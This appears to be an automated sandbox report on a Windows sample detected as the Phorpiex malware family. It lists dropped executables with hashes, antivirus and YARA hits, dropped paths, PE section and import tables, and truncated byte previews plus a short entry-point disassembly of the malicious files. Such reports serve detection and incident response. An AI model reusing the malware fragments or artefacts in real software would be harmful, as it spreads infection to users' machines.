                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                     • Filename: bBcZoComLl.exe, Detection: malicious
                                                                                                                                                     • Filename: file.exe, Detection: malicious
                                                                                                                                                     • Filename: dgiX55cHyU.exe, Detection: malicious
                                                                                                                                                     • Filename: GGXhCiYFBw.exe, Detection: malicious
                                                                                                                                                     • Filename: 0NSjUT34gS.exe, Detection: malicious
                                                                                                                                                     • Filename: bomb.exe, Detection: malicious
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....=d.........."...................... .....@..... .......................`............@...@......@............... ...............................@..(............................................................................................ ..H............text........ ...................... ..`.rsrc...(....@......................@..@.reloc.......`......."..............@..BH........#.......................................................................0..i.......r...pr...p(......&..r...pr...p(......&..(......&.. ....(....~.....(.....((....r:..p(....(......&...(....*....4...................%........(../........<.#_.......0..:.......s.......o......o.....(....o......o......o.....(....&..&..*..........66.......0..\..................rt..p....s.....(.........+6........o....o....r...p(....(...+.2...o....o.......X.......i2............r...p.........(....(.....
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\2658326577.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L......g.....................p......@y............@..........................p..............................................|0.......................................................................................................................text............................... ..`.rdata...?.......@..................@..@.data........@.......2..............@...................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):9728
                                                                                                                                                    Entropy (8bit):5.254547230411213
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:zMn7AN23D0TXraYgnY1dTNDiIp+BYA8vrcVO15uJxGE9YUBz2qh3C7tCEkC:A7ANUYhUYPtp+OFMJxTmUBzthckC
                                                                                                                                                    MD5:8D8E6C7952A9DC7C0C73911C4DBC5518
                                                                                                                                                    SHA1:9098DA03B33B2C822065B49D5220359C275D5E94
                                                                                                                                                    SHA-256:FEB4C3AE4566F0ACBB9E0F55417B61FEFD89DC50A4E684DF780813FB01D61278
                                                                                                                                                    SHA-512:91A573843C28DD32A9F31A60BA977F9A3D4BB19FFD1B7254333E09BCECEF348C1B3220A348EBB2CB08EDB57D56CB7737F026519DA52199C9DC62C10AEA236645
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gd.##.`p#.`p#.`p*}.p!.`p*}.p".`p*}.p6.`p...p(.`p#.ap..`p*}.p .`p*}.p".`pRich#.`p................PE..L.....Df..................................... ....@..........................`......?.....@.................................l$.......@.......................P.......................................#..@............ ...............................text...z........................... ..`.rdata..4.... ......................@..@.data........0......................@....rsrc........@....... ..............@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):110600
                                                                                                                                                    Entropy (8bit):7.998486619051527
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:3072:LFQC4AbS79Bo0bTtS3v4P09loyBE7QXNn8IJrF:LFQC4A+7jfiw8HoyYQXdXF
                                                                                                                                                    MD5:1FCB78FB6CF9720E9D9494C42142D885
                                                                                                                                                    SHA1:FEF9C2E728AB9D56CE9ED28934B3182B6F1D5379
                                                                                                                                                    SHA-256:84652BB8C63CA4FD7EB7A2D6EF44029801F3057AA2961867245A3A765928DD02
                                                                                                                                                    SHA-512:CDF58E463AF1784AEA86995B3E5D6B07701C5C4095E30EC80CC901FFD448C6F4F714C521BF8796FFA8C47538BF8BF5351E157596EFAA7AB88155D63DC33F7DC3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Preview:NGS!.....8y....j...x9"{[&..TL..,..L.nD..70Ln..MP.B..e...'.LpVJ...g...Y....]...h=....Ot(.P:...jjoF.....2y....:.P@.b...6]u...D\..i4<....Q?......._;]..!.A.4.A......1..c.sa^.+dQ!xl.6Q..8w...a7?..].T%:...H.1....$.j.......4f.k!...p.Fz.v..........?l...5...7...(.....=c.s..c.F.{..-.uE.8.D....QF...|.8.ey.3'.@<Kq.."S.-..?..4.s......S..2..j=.e..Le.....Yh....+...[}AM.,.@...gW\..Z)..ET.../|."...b.W........Ro.......j.(|A,....>.?.1;..>......".&.....;u.c.y..[....t..`...w ..#.....c.dyy...s..G.x_C.h...*I]..D....ey...:.FQ.Q...C.. .B.Z.n.2...@X.&>UY.g..D...YZ.)F.!..F...F...e....h4VGK.>.V......3#+.$.,.&.S...lk..I.F\..C.k$).J._l\.",.0u!.k..T....}.V...!..Y.....B....{}.....nAL...[.Xo[+.1\...m.,.^.bLMD.j.-g...... <._8d+-D./.k<..'.....dv...-.Q...i.`........N4W(._"..%.....5q..844o4..g..d..x....s...i.fc.....D..^..].....M(...A..[...gB4..m.w..AV....@.g..5.4.].....BLr!n*....W.G,6+uY..9U.4..........O..P....&....?.....v.K.i..>X...7Dt...o=.2........f....bi..C.5N.>.7lf.......^..@F.O
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\4BBF.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\71384504.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    Process:C:\Users\user\Desktop\thcdVit1dX.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):753
                                                                                                                                                    Entropy (8bit):5.009841577102086
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:ClrU8tVBOULLWUzJhRcSsxgXzdC5SsR8o5Ss/bxG5Ss/lxG5Ss/qxG5SsJ:CBLMwLLzJhRcSscdC5SsR8o5Ss/M5SsY
                                                                                                                                                    MD5:F861661AEB4FF1263AC9E286C8A546E4
                                                                                                                                                    SHA1:F7532C8C9EF99E840773E582465EEF0FE88E1518
                                                                                                                                                    SHA-256:540A6B2FAEA8FEA201CCC2A75F010475D40C5D8275D40A754685A9D5BDAD2C9D
                                                                                                                                                    SHA-512:08AA40497BD36EA886EC7C836C4DDE32CF825BE306A8A725EF553F8073C79A88A9CA5D120849B5A846D463CB67156007FE67FA85D74C0AB456C0B318612B3700
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:[1C58:1C5C][2024-10-26T01:26:16]i001: Burn x86 v5.0.0+41e11442b2ca93e444b60213b5ae99dcbab787d8, Windows v10.0 x64 (Build 19045: Service Pack 0), path: C:\Users\user\Desktop\thcdVit1dX.exe..[1C58:1CC0][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to extract all files from container, erf: 1:2:0..[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to wait for operation complete...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open attached container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to open attached UX container...[1C58:1C5C][2024-10-26T01:26:16]e000: Error 0x80070001: Failed to initialize core...
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):60
                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):286
                                                                                                                                                    Entropy (8bit):7.369827619940847
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:JI+cPhYsQuLyuCFmYRhegKv12u5JRn2BtmlFnI0QBIzxN0wi4HvvL:GvhouGFredJcBsjDqIdN0wiQvT
                                                                                                                                                    MD5:3DEA10446B12B8B16638C64ADEE9CF7D
                                                                                                                                                    SHA1:79E5EBA41FFD6D6D0C633E9851FF2BC8B6FCAEA7
                                                                                                                                                    SHA-256:E178E70155316BFFABAD28DB3DAF9F60A878243C5F3B8A59E37ADC7664F1A669
                                                                                                                                                    SHA-512:5247BEFA86704AEEB1ED782F025BD9B474E14F6A83E0E2B6DD4DC8800C23788FE2CA770AEBF8F4C0C0B5BE81311A0ABF9385F182FB7D0379094FCDD565B7C56D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Windows\sysppvrdnvs.exe
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4096
                                                                                                                                                    Entropy (8bit):4.856654624928782
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:F4OlognIZioHgWZbb7N8vNhsC2NQ7s+UJs20v7ing7/6bTwb:OOloDZiKLZbb7NkNhsl+UlGUc6bTC
                                                                                                                                                    MD5:98F07FE9691B1DF12FB691071E160D20
                                                                                                                                                    SHA1:73EBBADEA38617987E5B09BCF7411C1E2B33C967
                                                                                                                                                    SHA-256:4E3C5BC31D8420314A87FCFEBABE4CFAC9A3B9C898D3FC67BA6E6928686130E1
                                                                                                                                                    SHA-512:AD6CF43814F49F63569FA6354B50632A1BFFBBDED5479C82F0DF6BD204D7154E7C0026B5504A4C93AF23F0D2C008F8449D55825BD46FD002DA1FCAA9B448DDF1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\71384504.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):85504
                                                                                                                                                    Entropy (8bit):6.394560338648692
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:27zFjdFmav82WoPRgMRmtMJXlXXwfAbQaQG9MF7vRjoJrl:yRyO+oPKjoBAIcZF7vqrl
                                                                                                                                                    MD5:06560B5E92D704395BC6DAE58BC7E794
                                                                                                                                                    SHA1:FBD3E4AE28620197D1F02BFC24ADAF4DDACD2372
                                                                                                                                                    SHA-256:9EAAADF3857E4A3E83F4F78D96AB185213B6528C8E470807F9D16035DAADF33D
                                                                                                                                                    SHA-512:B55B49FC1BD526C47D88FCF8A20FCAED900BFB291F2E3E1186EC196A87127ED24DF71385AE04FEDCC802C362C4EBF38EDFC182013FEBF4496DDEB66CE5195EE3
                                                                                                                                                    Malicious:true
                                                                                                                                                    Yara Hits:
                                                                                                                                                    • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysppvrdnvs.exe, Author: Joe Security
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):7.4258534569714465
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:thcdVit1dX.exe
                                                                                                                                                    File size:1'390'680 bytes
                                                                                                                                                    MD5:cbd0e8f0c0aefe122d41029c119624cf
                                                                                                                                                    SHA1:8bfafcfb05c61d27d6bf114128a891d0799dd2bd
                                                                                                                                                    SHA256:6b9670cd01edbc5d5f1aa015fd976155660f8a7227f2c1a8d5dc6eaa7fe9a772
                                                                                                                                                    SHA512:8e9a5e54bb6d69c126508eb6a28ea9b6623e4e5a135360f5422498cdd31552e3105435a50de2b17fa4432f871021c40a6426c550e6ff51c86729c9344584ff2e
                                                                                                                                                    SSDEEP:24576:ifZIGdCrb22qa1kheV1xUDPKPiuls4keJKaDxrdIG4BBs94bVva6jL3e67:0tdCvqa7VHsjeKzG4BM4Nl/
                                                                                                                                                    TLSH:4A55AF316165242BDAF40D73F920D2307E2897282B4C86B6C6D0D91CB9685F67FFB25B
                                                                                                                                                    Icon Hash:0b3359d979333d17
                                                                                                                                                    Entrypoint:0x4c9000
                                                                                                                                                    Entrypoint Section:.zero
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
DLL Characteristics: NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0xDEAD [Thu Jan 1 15:50:05 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 7bfadc04305d1f82cd570b38018067b2
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
  Subject Chain
    Version:
    Thumbprint MD5:
    Thumbprint SHA-1:
    Thumbprint SHA-256:
    Serial:
Instruction
push ebp
mov ebp, esp
sub esp, 00000978h
call 00007F898482A227h
mov dword ptr [ebp-0000023Ch], eax
cmp dword ptr [ebp-0000023Ch], 00000000h
jne 00007F8984829567h
jmp 00007F8984829CAEh
push 00000000h
push 00000001h
push 9B102E2Dh
mov eax, dword ptr [ebp-0000023Ch]
push eax
call 00007F8984829FAEh
add esp, 10h
mov dword ptr [ebp-0000073Ch], eax
cmp dword ptr [ebp-0000073Ch], 00000000h
jne 00007F8984829567h
jmp 00007F8984829C82h
mov ecx, dword ptr [ebp-0000073Ch]
push ecx
push 00000001h
push 526E0DCDh
mov edx, dword ptr [ebp-0000023Ch]
push edx
call 00007F8984829F7Dh
add esp, 10h
mov dword ptr [ebp-000006A8h], eax
cmp dword ptr [ebp-000006A8h], 00000000h
jne 00007F8984829567h
jmp 00007F8984829C51h
mov eax, dword ptr [ebp-0000073Ch]
push eax
push 00000001h
push C4B4A94Dh
mov ecx, dword ptr [ebp-0000023Ch]
push ecx
call 00007F8984829F4Ch
add esp, 10h
mov dword ptr [ebp-0000076Ch], eax
cmp dword ptr [ebp-0000076Ch], 00000000h
jne 00007F8984829567h
jmp 00007F8984829C20h
mov edx, 00000025h
mov word ptr [ebp-00000768h], dx
mov eax, 00000061h
mov word ptr [ebp-00000766h], ax
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xaf420 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb5000 | 0xc47c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x14f8c0 | 0x2f98 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0x6630 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xae0dc | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xae140 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa0528 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x77000 | 0x3f0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xaee24 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x75f63 | 0x76000 | a1f881840c99f0a4f216f03d8dfec448 | False | 0.4892660884533898 | data | 6.479952028106227 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x77000 | 0x39aee | 0x39c00 | 2748b28fd40b68a9bf7113f8b5d73c62 | False | 0.24370941558441558 | data | 5.025845007148222 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xb1000 | 0x180c | 0xa00 | 2808333f0787ad82f8c9dd8967360f58 | False | 0.191015625 | firmware 4ee6 v40bb (revision 0) \320nF V2, 0 bytes or less, at 0xb119bf44 0 bytes , at 0 0 bytes , at 0xffffffff 16777216 bytes | 2.3545373947133976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0xb3000 | 0xd4 | 0x200 | effae655fcae4daf3bc3f80a07a37362 | False | 0.265625 | PGP Secret Sub-key - | 1.8546470945125824 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0xb4000 | 0x30 | 0x200 | 20a58c151b9e1fb9cfe8116f62444024 | False | 0.107421875 | data | 0.5734966016060967 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xb5000 | 0xc47c | 0xc600 | a0256b519fc2a6ba3cf3e1fed05cf577 | False | 0.4613123421717172 | data | 6.265100639128537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0x6630 | 0x6800 | dfe4c001a82fea80bfc84b6e5185738b | False | 0.7883112980769231 | data | 6.776140638251558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.zero | 0xc9000 | 0xdb0 | 0x1000 | 2e89f54f1904c4f8301e18e29cf9499f | False | 0.63525390625 | data | 6.347128369214904 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb5280 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | English | United States | 0.5531914893617021
RT_ICON | 0xb56e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m | English | United States | 0.39385245901639343
RT_ICON | 0xb6070 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | English | United States | 0.3025328330206379
RT_ICON | 0xb7118 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | English | United States | 0.19595435684647303
RT_ICON | 0xb96c0 | 0x33aa | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9874489641615001
RT_RCDATA | 0xbca6c | 0x8 | data | English | United States | 1.75
RT_MESSAGETABLE | 0xbca74 | 0x3df8 | data | English | United States | 0.282274331820474
RT_GROUP_ICON | 0xc086c | 0x4c | data | English | United States | 0.7763157894736842
RT_VERSION | 0xc08b8 | 0x390 | data | English | United States | 0.4298245614035088
RT_MANIFEST | 0xc0c48 | 0x832 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (2038), with CRLF line terminators | English | United States | 0.30743565300285985
DLL | Import
KERNEL32.dll | InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseMutex, CreateEventW, GetCurrentProcess, CreateThread, GetNativeSystemInfo, VerSetConditionMask, GetSystemTime, GetComputerNameW, VerifyVersionInfoW, GetDateFormatW, CompareStringW, GetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, CreateProcessW, DuplicateHandle, GetExitCodeProcess, CompareStringOrdinal, ProcessIdToSessionId, OpenProcess, GetProcessId, SetProcessShutdownParameters, CreateSemaphoreW, LocalFileTimeToFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeLibrary, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, GetStdHandle, GetModuleHandleExW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, VirtualQuery, VirtualProtect, GetSystemInfo, RaiseException, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CopyFileW, GlobalFree, GlobalAlloc, Sleep, SetFileTime, SetFilePointerEx, SetEndOfFile, ReadFile, LoadLibraryExA, GetFileSizeEx, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CreateDirectoryW, GetCurrentDirectoryW, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, GetSystemWindowsDirectoryW, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, WriteFile, SetFilePointer, CreateFileA, ExitProcess, CloseHandle, RtlUnwind, CreateFileW
